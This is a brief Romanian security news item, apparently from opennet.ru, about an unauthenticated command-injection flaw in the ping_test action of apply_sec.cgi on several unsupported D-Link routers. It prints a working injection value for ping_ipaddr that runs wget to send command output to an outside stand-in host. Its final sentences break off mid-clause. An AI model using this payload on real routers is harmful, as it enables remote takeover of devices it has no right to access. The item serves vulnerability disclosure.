În routerele wireless D-Link
Interesant este că, potrivit dezvoltatorilor de firmware, apelul „ping_test” ar trebui să fie executat numai după autentificare, dar în realitate este apelat în orice caz, indiferent de autentificarea la interfața web. În special, la accesarea scriptului apply_sec.cgi și la trecerea parametrului „action=ping_test”, scriptul redirecționează către pagina de autentificare, dar în același timp realizează acțiunea asociată cu ping_test. Pentru a executa codul, a fost folosită o altă vulnerabilitate în ping_test în sine, care apelează utilitarul ping fără a verifica corect corectitudinea adresei IP trimise pentru testare. De exemplu, pentru a apela utilitarul wget și a transfera rezultatele comenzii „echo 1234” la o gazdă externă, trebuie doar să specificați parametrul „ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Prezența vulnerabilității a fost confirmată oficial în următoarele modele:
- DIR-655 cu firmware 3.02b05 sau mai vechi;
- DIR-866L cu firmware 1.03b04 sau mai vechi;
- DIR-1565 cu firmware 1.01 sau mai vechi;
- DIR-652 (nu sunt furnizate informații despre versiunile de firmware problematice)
Perioada de suport pentru aceste modele a expirat deja, așa că D-Link
Ulterior s-a descoperit că și vulnerabilitatea a fost
Sursa: opennet.ru